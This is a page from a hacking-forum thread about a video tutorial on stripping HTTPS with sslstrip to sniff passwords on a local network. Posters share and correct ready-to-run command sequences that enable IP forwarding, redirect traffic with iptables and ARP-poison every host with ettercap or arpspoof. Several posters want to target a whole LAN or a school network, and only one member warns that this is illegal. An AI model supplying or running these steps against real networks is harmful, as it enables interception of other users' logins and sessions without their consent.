Results 21 to 30 of 79

Thread: [Video] How to: Snifff SSL / HTTPS (sslstrip)

  1. #21
    Just burned his ISO
    Join Date
    Apr 2010
    Location
    Argentina
    Posts
    1

    Question Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Hi all. I've a question. Why do you use "-k" when you launch sslstrip? What's the difference if you don't use it? (I'm about to try that)

    Thank you


    Av4t4r.


    P.S: my first post

  2. #22
    Member joker5bb's Avatar
    Join Date
    Feb 2010
    Posts
    166

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Here is a better way of doing this:

    Code:
    kate /etc/etter.conf
    >*uncomment redir_command_off & redir_command_on in the iptables, linux section*
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    sslstrip -a -k -f
    ettercap -T -q -i wlan0 -M ARP //
    This way we could poison all IPs

  3. #23
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Quote Originally Posted by opreat0r View Post
    There's also xhydra if you don't like the CLI, helps with trial and error type of attacks
    Isn't xhydra bruteforcing? This isn't about that. This is about sniffing traffic and watching it being passed over the network. Not us doing trial and error password guessing.



    Quote Originally Posted by sql-inj View Post
    I can't see the reason for using both ettercap AND arp-spoof. You can do the arp-poisoning using ettercap, no need for arp-spoof.

    (If I am mistaken, please do correct me)
    I had problems when using JUST ettercap. I dunno why that was right now tho



    Quote Originally Posted by ethicalhacker View Post
    That was a great posting.

    I have a doubt

    I don't find wlan0 in my LAN.

    Can I interchange, it will eth0

    will it work???
    wlan0 = Wireless
    eth0 = Ethernet (wired).
    I was doing it over my wireless network. If you don't have a wireless network - you can also do it over wired, just replace wlan0 with your interface! (e.g. eth0 or eth1)



    Quote Originally Posted by leroy View Post
    Can anyone provide a "cleanup" routine for this?

    So the attacker system is in same state as before.

    Thanks
    Leroy
    As Corleone said
    Code:
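    iptables --flush
    iptables -t nat --flush   # the REDIRECT rule lives in the nat table; a plain --flush only clears the filter table
    will reset the iptables. The other programs, once you quit them, tidy themselves up.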



    Quote Originally Posted by nivong View Post
    You have some typos in your code:

    Code:
    kate /etc/etter.conf
    and
    Code:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    that's all
    Thanks for pointing this out!



    Quote Originally Posted by Dezio View Post
    Thanks for the tut, I've tried it and all works correctly.
    I've just a question.. how can I "arpspoof" the entire LAN? Can I use something like this?


    Code:
    arpspoof -i wlan0 -t 192.168.*.* 192.168.1.1
    khianhui has this covered.
    Quote Originally Posted by khianhui View Post
    You should find out which is the broadcast address of your network. For example 192.168.1.255 instead of 192.168.1.*.


    Quote Originally Posted by Av4t4r View Post
    Hi all. I've a question. Why do you use "-k" when you launch sslstrip? What's the difference if you don't use it? (I'm about to try that)

    Thank you


    Av4t4r.


    P.S: my first post
    sslstrip 0.6 by Moxie Marlinspike
    Usage: sslstrip <options>
    Options:
    -w <filename>, --write=<filename> Specify file to log to (optional).
    -p , --post Log only SSL POSTs. (default)
    -s , --ssl Log all SSL traffic to and from server.
    -a , --all Log all SSL and HTTP traffic to and from server.
    -l <port>, --listen=<port> Port to listen on (default 10000).
    -f , --favicon Substitute a lock favicon on secure requests.
    -k , --killsessions Kill sessions in progress.
    -h Print this help message.
    What this does (if I remember rightly): any currently connected sessions are killed once this is run. For example, if they were logged into Gmail, they would have to log in again. I also recommend trying "-f". See what that does


    Quote Originally Posted by joker5bb View Post
    Here is a better way of doing this:

    Code:
    kate /etc/etter.conf
    >*uncomment redir_command_off & redir_command_on in the iptables, linux section*
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    sslstrip -a -k -f
    ettercap -T -q -i wlan0 -M ARP //
    This way we could poison all IPs
    I had problems when I tried it using ettercap to do the ARP poison. You can tho do all IPs with arpspoof! *see above*
    edit: You're also missing an extra // if you did wanna try ettercap
    Code:
     ettercap -T -q -i wlan0 -M ARP // //
    Last edited by g0tmi1k; 04-18-2010 at 07:09 PM.
    Have you...g0tmi1k?

  4. #24
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    2

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Hello. I don't understand some situations.

    Why are you using --destination-port 80 if HTTPS works on port 443?
    In my case, changing the value in ip_forward is not working; I can only use the forwarding capabilities when I use fragrouter, but the sniffer doesn't work, I can't get any decrypted data.

    I have tried to make the attack in my test room and I can't get it to work.

    iptables -t nat A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

  5. #25
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    8

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Can this be done with the mon0 interface simply while sniffing the network with airmon-ng, or does wlan0 have to actually be connected to the wireless network in order to use arpspoof and sslstrip?

  6. #26
    Member joker5bb's Avatar
    Join Date
    Feb 2010
    Posts
    166

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Quote Originally Posted by mastodongle View Post
    Can this be done with the mon0 interface simply while sniffing the network with airmon-ng, or does wlan0 have to actually be connected to the wireless network in order to use arpspoof and sslstrip?
    You need to be on the gateway for the attack.

  7. #27
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    1

    Thumbs up Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Thank you so much man!
    I didn't know how to bypass the SSL security.

    BTW: I think someone on my net (200+ PCs on the net) tried to sniff my brother's passwords... (Firefox blocked it like in your video).

    Is there any way I can track the attacker / block the attacks?

    edit: I wasn't able to sniff the whole network.
    How can I sniff (with ettercap) a range of IPs?
    Because putting 192.168.0.255 didn't work (it's just 1 computer)
    Last edited by proisr; 04-26-2010 at 12:45 PM.

  8. #28
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    2

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    You are perfect m8! And I have a question


    We use Cyberoam to enter the internet @ my school. When you connect to the school wireless, it redirects you to http://192.168.150.1:8090/httpclient.html and you have to enter your username and password to use the internet connection..

    1. Should I enter my pass and user name to sniff? Or is being connected to wireless enough?
    2. When I use ifconfig it says Bcast:192.168.62.255. Do I use this instead of 192.168.1.1?

  9. #29
    Junior Member WolverineOD's Avatar
    Join Date
    Apr 2010
    Location
    Infront of Screen
    Posts
    28

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Quote Originally Posted by nicksiz View Post
    We use Cyberoam to enter the internet @ my school
    As tempting as it may be to try arpspoofing your school network, you should first realize that it's illegal to do without explicit consent from your school (which I doubt they will give) and that we don't support or condone this kind of activity in these forums. Besides which, this will totally kill all the network traffic (because all the traffic is being routed through the attacker's PC, downside of arpspoofing) and your system admins will likely notice if they know what they are doing. It's not worth it. Take care mate.

    However if anybody else is confused about this:
    Quote Originally Posted by nicksiz View Post
    When I use ifconfig it says Bcast:192.168.62.255. Do I use this instead of 192.168.1.1?
    Yes this is the case. If you have a different broadcast address, use it. The addresses given by g0tmi1k are only example addresses, which apply to the network he was using. Addresses will likely be different for your own network. Hope that helps.

  10. #30
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    2

    Default Re: [Video] How to: Snifff SSL / HTTPS (sslstrip)

    Thanks m8 for your answer. It's not illegal because I have been doing it with my teacher for his PC only, but we didn't do it. Thanks 4 your help, this forum is perfect
